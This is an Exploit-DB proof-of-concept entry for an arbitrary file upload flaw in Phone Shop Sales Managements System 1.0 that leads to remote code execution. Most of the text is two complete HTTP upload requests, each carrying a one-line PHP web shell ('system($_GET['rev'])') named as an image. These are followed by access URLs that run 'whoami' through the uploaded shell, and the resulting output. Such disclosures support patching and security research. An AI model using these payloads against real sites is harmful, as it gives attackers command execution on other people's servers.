exploit-db-mirror/exploits/php/webapps/50106.txt

# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution
# Date: 2021-07-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10, XAMPP


###########
# PoC 1:  #
###########

Request:
========

POST /osms/Execute/ExAddProduct.php HTTP/1.1
Host: localhost
Content-Length: 2160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/AddNewProduct.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0
Connection: close

------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductName"

camera
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BrandName"

soskod
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductPrice"

12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Quantity"

1
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="TotalPrice"

12
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="DisplaySize"

15
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="OperatingSystem"

windows
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Processor"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="InternalMemory"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="RAM"

4
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="CameraDescription"

lens
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="BatteryLife"

3300
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Weight"

500
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Model"

AIG34
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Dimension"

5 inch
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ASIN"

9867638
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="ProductImage"; filename="rev.php"
Content-Type: application/octet-stream

<?php echo "result: ";system($_GET['rev']); ?>
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="date2"

2020-06-03
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="Description"

accept
------WebKitFormBoundaryIBZWMUliFtu0otJ0
Content-Disposition: form-data; name="_wysihtml5_mode"

1
------WebKitFormBoundaryIBZWMUliFtu0otJ0--



###########
# PoC 2:  #
###########

Request:
========

POST /osms/Execute/ExChangePicture.php HTTP/1.1
Host: localhost
Content-Length: 463
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/UserProfile.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594
Connection: close

------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="IDUser"

6
------WebKitFormBoundary4Dm8cGBqGNansHqI
Content-Disposition: form-data; name="Image"; filename="rev.php"
Content-Type: application/octet-stream

<?php echo "output: ";system($_GET['rev']); ?>
------WebKitFormBoundary4Dm8cGBqGNansHqI--



###########
# Access: #
###########

# Webshell access via:
PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami
PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami

# Output:
result: windows10\user